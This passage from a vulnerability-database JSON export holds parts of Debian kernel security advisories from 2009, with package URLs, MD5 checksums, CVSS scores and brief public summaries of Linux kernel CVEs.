http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.8etch1_hppa.deb\n Size/MD5 checksum: 258378 4a864d5f74cd4f1e05362aa00e94236a\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.8etch1_hppa.deb\n Size/MD5 checksum: 14847618 ab5989ffb84c1780ba7a8d06ac501f67\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_hppa.deb\n Size/MD5 checksum: 3439250 22ebf43e46ee15c1240d6881c2554248\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.8etch1_hppa.deb\n Size/MD5 checksum: 13845394 731ba27a151e94071c8f64ceb0da9e92\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.8etch1_i386.deb\n Size/MD5 checksum: 360908 aef486d9faf9aca0e61ea01e16d0cbc8\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.8etch1_i386.deb\n Size/MD5 checksum: 19348860 15a2e2dc1fa2b3b423d3010272f7f3f6\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_i386.deb\n Size/MD5 checksum: 82124 ee99a97dc91f3c2e205bce0b901904c0\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.8etch1_i386.deb\n Size/MD5 checksum: 359834 d80f275632e07acaaa02679eee976bb6\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.8etch1_i386.deb\n Size/MD5 checksum: 82160 07df09b3f1af03cd0f20d2b0cf2b679a\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch1_i386.deb\n Size/MD5 checksum: 347518 a3530c65c732ef54f207a3551c85ec9f\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.8etch1_i386.deb\n Size/MD5 checksum: 19344944 28d8879c242e0698ee8524d006970445\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.8etch1_i386.deb\n Size/MD5 checksum: 361402 3bad41e46bd717ebe8d15e0473f130eb\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.8etch1_i386.deb\n Size/MD5 checksum: 19589084 a8319258d3194cd59fa263a1b66a5626\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.8etch1_i386.deb\n Size/MD5 checksum: 19278254 608362b1503eb3ec838bd01152d7aa93\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_i386.deb\n Size/MD5 checksum: 3647296 a6ce4748c3fefd49a40ebbfed1e004f9\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.8etch1_ia64.deb\n Size/MD5 checksum: 318210 76ad07637a2fac8a32d827c23f893ffa\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.8etch1_ia64.deb\n Size/MD5 checksum: 32025152 eb4eec0df149a61e18ae22ef8c50eb43\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.8etch1_ia64.deb\n Size/MD5 checksum: 318482 a155708aa4e74d90e54a4f107221c995\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_ia64.deb\n Size/MD5 checksum: 3567324 0e1d20a7ecbf444ad6aba30cc169963d\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_ia64.deb\n Size/MD5 checksum: 82000 f66623c2c53891b0d92055fb032d0592\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.8etch1_ia64.deb\n Size/MD5 checksum: 32206190 62738a79d48dffcad324124d2b73f3d4\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.8etch1_ia64.deb\n Size/MD5 checksum: 82028 6aa864922de84ad84cfff13eb9ce71ee\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 308452 f5d33880c20e98b12a9ad5ef53743910\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 214502 a39b0ecffd3a215979f8e5bcdcd78bfe\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 17166576 38a62721888bbb2f0fc4d7fbdba70c9e\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 82062 3aa3ea6a854d046759d5824257e47bf3\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 17151594 603b866be5168c042bbef832eb253c9d\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 10522386 725913ed966df3029d3f72332af590fd\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 225228 e8ad107d20c67c798cdb093ae150592c\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 246218 69eee0d55e37c414da07e70b90c190a9\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 11957416 9d75b25a0668735d4bfb1fac77788723\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 27772372 307325283c10af9dd6dc8cb4f0de39a7\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 246310 815dfe8f02f354f03f0d63f8605bedd9\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 22150880 d183f2a93f59d18034573fd7febf5e22\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 3803446 4448552a0dd930e3d51a800c1d6deb50\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 82008 871aace093a3411d3d01dfcc19e57a7a\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch1_mips.deb\n Size/MD5 checksum: 309908 ebc141db56c3f149eaf265af89054e03\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 3803432 926f0974edf97ded8ef4bd4f99847b35\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 245716 9a62f6221f1b1e36c8b397e5afcb966a\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 82060 401c4c5fb02f54a0deacef21bf630b0e\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 26982892 39032aaca4b2a6cecc7091022a42e2b7\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 16629962 874a967e72aa10398626267cb2d5ba54\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 21732318 7819062b50720a60a098d086978298ea\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 82012 06886337047db3ad1df77cc919c4cff6\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 246190 ec4b8f66e8a0065d694f990745049e7e\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 16566324 d778d8f7f199e49cb087fafaef7eb551\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 13316760 aadc4a462ca185163c902551556c92f6\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 309226 44e7866afb834db0bf71a9d034d729ba\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 308360 e53f7681e10aa6b07d1ea3e3b58622da\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.8etch1_mipsel.deb\n Size/MD5 checksum: 245984 a572ee84ea19bb4bb908e6c20a56ca37\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.8etch1_powerpc.deb\n Size/MD5 checksum: 19194974 99103ae37f6001139ea44dd31f84183f\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.8etch1_powerpc.deb\n Size/MD5 checksum: 320916 0ba37f3d80f38b92b9097ea7e90fb3e7\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.8etch1_powerpc.deb\n Size/MD5 checksum: 320840 0ab836295bc998d5b54f9d54bb2bd23c\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.8etch1_powerpc.deb\n Size/MD5 checksum: 19485870 bbee80ba2e47827a9f8ac2360ccf9e68\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_powerpc.deb\n Size/MD5 checksum: 3672412 4ff49fe861ab4f49eec95d425114c349\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_powerpc.deb\n Size/MD5 checksum: 82012 03d29f46bdcab8bab20d237a294fc242\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.8etch1_powerpc.deb\n Size/MD5 checksum: 295058 7718f3ba536f4af7252961bbbbab24be\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.8etch1_powerpc.deb\n Size/MD5 checksum: 21169748 db5e60f6e3ba1fcd12a793fd30f75c14\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.8etch1_powerpc.deb\n Size/MD5 checksum: 17459470 60369530c57a669b6c9bcd441f757417\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.8etch1_powerpc.deb\n Size/MD5 checksum: 322436 779ccace55f22bdcf1ccd9212033b58d\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.8etch1_powerpc.deb\n Size/MD5 checksum: 82046 39a3cbedcbc4e13f997b7641394e3ad0\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.8etch1_s390.deb\n Size/MD5 checksum: 1501738 7bf06e1f51092c18b512045444fba8e9\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.8etch1_s390.deb\n Size/MD5 checksum: 193848 6713da5dfd8696c27718075e6cb3fa03\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.8etch1_s390.deb\n Size/MD5 checksum: 82016 1668a7a797859f5d9e0a7af2ba1781b4\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.8etch1_s390.deb\n Size/MD5 checksum: 6950110 9f8a8d765c71aaee7e94402626f413a1\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_s390.deb\n Size/MD5 checksum: 82002 0f37b246336adf27ce4d37776257ff95\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.8etch1_s390.deb\n Size/MD5 checksum: 7200396 de8ace94802f259aef088e9384a4ca6b\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.8etch1_s390.deb\n Size/MD5 checksum: 194084 ea695f010b1916d50f1bdad2e85dd1f0\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_s390.deb\n Size/MD5 checksum: 3429706 8a40f944fa6b7c64353d76154bded277\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.8etch1_sparc.deb\n Size/MD5 checksum: 82152 88b0f93df760ac992f30c1927d0144f7\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.8etch1_sparc.deb\n Size/MD5 checksum: 3652306 42dda4de967328363df86bee8ba0c53b\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.8etch1_sparc.deb\n Size/MD5 checksum: 13022916 93538efd19eae1488128df8a3a73b957\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.8etch1_sparc.deb\n Size/MD5 checksum: 263066 c796e2fd4e51ff6a66d9eec594c81386\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.8etch1_sparc.deb\n Size/MD5 checksum: 13317632 e50f9515e67c38d66c58f317bf2c9292\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.8etch1_sparc.deb\n Size/MD5 checksum: 264930 a1d0ba75ee8eded18b4d97327ebd0291\n http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.8etch1_sparc.deb\n Size/MD5 checksum: 82128 6c1ebe596b196e25cb0307f78ab1f358\n\n\n These changes will probably be included in the oldstable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2009-05-02T18:33:03", "type": "debian", "title": "[SECURITY] [DSA 1787-1] New Linux 2.6.24 packages fix several vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4307", "CVE-2008-5079", "CVE-2008-5395", "CVE-2008-5700", "CVE-2008-5701", "CVE-2008-5702", "CVE-2009-0028", "CVE-2009-0029", "CVE-2009-0031", "CVE-2009-0065", "CVE-2009-0269", "CVE-2009-0322", "CVE-2009-0675", "CVE-2009-0676", "CVE-2009-0745", "CVE-2009-0834", "CVE-2009-0859", "CVE-2009-1046", "CVE-2009-1192", "CVE-2009-1242", "CVE-2009-1265", "CVE-2009-1337", "CVE-2009-1338", "CVE-2009-1439"], "modified": "2009-05-02T18:33:03", "id": "DEBIAN:DSA-1787-1:1654D", "href": "https://lists.debian.org/debian-security-announce/2009/msg00098.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-08-10T07:07:26", "description": "\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service, privilege escalation or a sensitive\nmemory leak. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\n\n* [CVE-2009-0028](https://security-tracker.debian.org/tracker/CVE-2009-0028)\nChris Evans discovered a situation in which a child process can\n send an arbitrary signal to its parent.\n* [CVE-2009-0834](https://security-tracker.debian.org/tracker/CVE-2009-0834)\nRoland McGrath discovered an issue on amd64 kernels that allows\n local users to circumvent system call audit configurations which\n filter based on the syscall numbers or argument details.\n* [CVE-2009-0835](https://security-tracker.debian.org/tracker/CVE-2009-0835)\nRoland McGrath discovered an issue on amd64 kernels with\n CONFIG\\_SECCOMP enabled. By making a specially crafted syscall,\n local users can bypass access restrictions.\n* [CVE-2009-0859](https://security-tracker.debian.org/tracker/CVE-2009-0859)\nJiri Olsa discovered that a local user can cause a denial of\n service (system hang) using a SHM\\_INFO shmctl call on kernels\n compiled with CONFIG\\_SHMEM disabled. This issue does not affect\n prebuilt Debian kernels.\n* [CVE-2009-1046](https://security-tracker.debian.org/tracker/CVE-2009-1046)\nMikulas Patocka reported an issue in the console subsystem that\n allows a local user to cause memory corruption by selecting a\n small number of 3-byte UTF-8 characters.\n* [CVE-2009-1072](https://security-tracker.debian.org/tracker/CVE-2009-1072)\nIgor Zhbanov reported that nfsd was not properly dropping\n CAP\\_MKNOD, allowing users to create device nodes on file systems\n exported with root\\_squash.\n* [CVE-2009-1184](https://security-tracker.debian.org/tracker/CVE-2009-1184)\nDan Carpenter reported a coding issue in the selinux subsystem\n that allows local users to bypass certain networking checks when\n running with compat\\_net=1.\n* [CVE-2009-1192](https://security-tracker.debian.org/tracker/CVE-2009-1192)\nShaohua Li reported an issue in the AGP subsystem they may allow\n local users to read sensitive kernel memory due to a leak of\n uninitialized memory.\n* [CVE-2009-1242](https://security-tracker.debian.org/tracker/CVE-2009-1242)\nBenjamin Gilbert reported a local denial of service vulnerability\n in the KVM VMX implementation that allows local users to trigger\n an oops.\n* [CVE-2009-1265](https://security-tracker.debian.org/tracker/CVE-2009-1265)\nThomas Pollet reported an overflow in the af\\_rose implementation\n that allows remote attackers to retrieve uninitialized kernel\n memory that may contain sensitive data.\n* [CVE-2009-1337](https://security-tracker.debian.org/tracker/CVE-2009-1337)\nOleg Nesterov discovered an issue in the exit\\_notify function that\n allows local users to send an arbitrary signal to a process by\n running a program that modifies the exit\\_signal field and then\n uses an exec system call to launch a setuid application.\n* [CVE-2009-1338](https://security-tracker.debian.org/tracker/CVE-2009-1338)\nDaniel Hokka Zakrisson discovered that a kill(-1) is permitted to\n reach processes outside of the current process namespace.\n* [CVE-2009-1439](https://security-tracker.debian.org/tracker/CVE-2009-1439)\nPavan Naregundi reported an issue in the CIFS filesystem code that\n allows remote users to overwrite memory via a long\n nativeFileSystem field in a Tree Connect response during mount.\n\n\nFor the oldstable distribution (etch), these problems, where applicable,\nwill be fixed in future updates to linux-2.6 and linux-2.6.24.\n\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.6.26-15lenny2.\n\n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux packages.\n\n\nNote: Debian carefully tracks all known security issues across every\nlinux kernel package in all releases under active security support.\nHowever, given the high frequency at which low-severity security\nissues are discovered in the kernel and the resource requirements of\ndoing an update, updates for lower priority issues will normally not\nbe released for all kernels at the same time. Rather, they will be\nreleased in a staggered or \"leap-frog\" fashion.\n\n\n", "cvss3": {}, "published": "2009-05-15T00:00:00", "type": "osv", "title": "linux-2.6 user-mode-linux - several vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1046", "CVE-2009-0859", "CVE-2009-1184", "CVE-2009-0028", "CVE-2009-1242", "CVE-2009-1072", "CVE-2009-0835", "CVE-2009-1192", "CVE-2009-1338", "CVE-2009-1337", "CVE-2009-0834", "CVE-2009-1265", "CVE-2009-1439"], "modified": "2022-08-10T07:07:24", "id": "OSV:DSA-1800-1", "href": "https://osv.dev/vulnerability/DSA-1800-1", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-07-21T08:33:16", "description": "\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service or privilege escalation. The Common\nVulnerabilities and Exposures project identifies the following\nproblems:\n\n\n* [CVE-2008-4307](https://security-tracker.debian.org/tracker/CVE-2008-4307)\nBryn M. Reeves reported a denial of service in the NFS filesystem.\n Local users can trigger a kernel BUG() due to a race condition in\n the do\\_setlk function.\n* [CVE-2008-5079](https://security-tracker.debian.org/tracker/CVE-2008-5079)\nHugo Dias reported a DoS condition in the ATM subsystem that can\n be triggered by a local user by calling the svc\\_listen function\n twice on the same socket and reading /proc/net/atm/\\*vc.\n* [CVE-2008-5395](https://security-tracker.debian.org/tracker/CVE-2008-5395)\nHelge Deller discovered a denial of service condition that allows\n local users on PA-RISC systems to crash a system by attempting to\n unwind a stack containing userspace addresses.\n* [CVE-2008-5700](https://security-tracker.debian.org/tracker/CVE-2008-5700)\nAlan Cox discovered a lack of minimum timeouts on SG\\_IO requests,\n which allows local users of systems using ATA to cause a denial of\n service by forcing drives into PIO mode.\n* [CVE-2008-5701](https://security-tracker.debian.org/tracker/CVE-2008-5701)\nVlad Malov reported an issue on 64-bit MIPS systems where a local\n user could cause a system crash by crafing a malicious binary\n which makes o32 syscalls with a number less than 4000.\n* [CVE-2008-5702](https://security-tracker.debian.org/tracker/CVE-2008-5702)\nZvonimir Rakamaric reported an off-by-one error in the ib700wdt\n watchdog driver which allows local users to cause a buffer\n underflow by making a specially crafted WDIOC\\_SETTIMEOUT ioctl\n call.\n* [CVE-2009-0028](https://security-tracker.debian.org/tracker/CVE-2009-0028)\nChris Evans discovered a situation in which a child process can\n send an arbitrary signal to its parent.\n* [CVE-2009-0029](https://security-tracker.debian.org/tracker/CVE-2009-0029)\nChristian Borntraeger discovered an issue effecting the alpha,\n mips, powerpc, s390 and sparc64 architectures that allows local\n users to cause a denial of service or potentially gain elevated\n privileges.\n* [CVE-2009-0031](https://security-tracker.debian.org/tracker/CVE-2009-0031)\nVegard Nossum discovered a memory leak in the keyctl subsystem\n that allows local users to cause a denial of service by consuming\n all of kernel memory.\n* [CVE-2009-0065](https://security-tracker.debian.org/tracker/CVE-2009-0065)\nWei Yongjun discovered a memory overflow in the SCTP\n implementation that can be triggered by remote users, permitting\n remote code execution.\n* [CVE-2009-0269](https://security-tracker.debian.org/tracker/CVE-2009-0269)\nDuane Griffin provided a fix for an issue in the eCryptfs\n subsystem which allows local users to cause a denial of service\n (fault or memory corruption).\n* [CVE-2009-0322](https://security-tracker.debian.org/tracker/CVE-2009-0322)\nPavel Roskin provided a fix for an issue in the dell\\_rbu driver\n that allows a local user to cause a denial of service (oops) by\n reading 0 bytes from a sysfs entry.\n* [CVE-2009-0675](https://security-tracker.debian.org/tracker/CVE-2009-0675)\nRoel Kluin discovered inverted logic in the skfddi driver that\n permits local, unprivileged users to reset the driver statistics.\n* [CVE-2009-0676](https://security-tracker.debian.org/tracker/CVE-2009-0676)\nClement LECIGNE discovered a bug in the sock\\_getsockopt function\n that may result in leaking sensitive kernel memory.\n* [CVE-2009-0745](https://security-tracker.debian.org/tracker/CVE-2009-0745)\nPeter Kerwien discovered an issue in the ext4 filesystem that\n allows local users to cause a denial of service (kernel oops)\n during a resize operation.\n* [CVE-2009-0834](https://security-tracker.debian.org/tracker/CVE-2009-0834)\nRoland McGrath discovered an issue on amd64 kernels that allows\n local users to circumvent system call audit configurations which\n filter based on the syscall numbers or argument details.\n* [CVE-2009-0859](https://security-tracker.debian.org/tracker/CVE-2009-0859)\nJiri Olsa discovered that a local user can cause a denial of\n service (system hang) using a SHM\\_INFO shmctl call on kernels\n compiled with CONFIG\\_SHMEM disabled. This issue does not affect\n prebuilt Debian kernels.\n* [CVE-2009-1046](https://security-tracker.debian.org/tracker/CVE-2009-1046)\nMikulas Patocka reported an issue in the console subsystem that\n allows a local user to cause memory corruption by selecting a\n small number of 3-byte UTF-8 characters.\n* [CVE-2009-1192](https://security-tracker.debian.org/tracker/CVE-2009-1192)\nShaohua Li reported an issue in the AGP subsystem that may allow\n local users to read sensitive kernel memory due to a leak of\n uninitialized memory.\n* [CVE-2009-1242](https://security-tracker.debian.org/tracker/CVE-2009-1242)\nBenjamin Gilbert reported a local denial of service vulnerability\n in the KVM VMX implementation that allows local users to trigger\n an oops.\n* [CVE-2009-1265](https://security-tracker.debian.org/tracker/CVE-2009-1265)\nThomas Pollet reported an overflow in the af\\_rose implementation\n that allows remote attackers to retrieve uninitialized kernel\n memory that may contain sensitive data.\n* [CVE-2009-1337](https://security-tracker.debian.org/tracker/CVE-2009-1337)\nOleg Nesterov discovered an issue in the exit\\_notify function that\n allows local users to send an arbitrary signal to a process by\n running a program that modifies the exit\\_signal field and then\n uses an 